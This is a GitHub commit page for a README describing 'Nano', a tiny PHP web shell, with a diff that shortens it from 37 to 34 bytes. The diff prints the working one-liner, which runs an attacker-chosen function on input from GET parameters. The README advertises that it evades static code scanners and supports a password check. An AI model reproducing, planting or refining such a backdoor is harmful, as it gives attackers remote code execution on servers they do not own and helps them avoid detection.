Skip to content

Commit

Permalink
shortened to 34 bytes
Browse files Browse the repository at this point in the history
  • Loading branch information
s0md3v authored Jul 11, 2018
1 parent 51b5053 commit 404f078
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,10 +7,10 @@ For example, if short tags are disabled, you will need to replace <? with <?php.

### Nano
```php
<?$x=$_GET;$x[p]=='_'&&$x[f]($x[c]);
<?$x=$_GET;$x[p]==_&&$x[f]($x[c]);
```
#### Features
- 37 bytes in size
- 34 bytes in size
- Can't be detected by static code scanners
- Supports authentication
Expand Down

0 comments on commit 404f078

Please sign in to comment.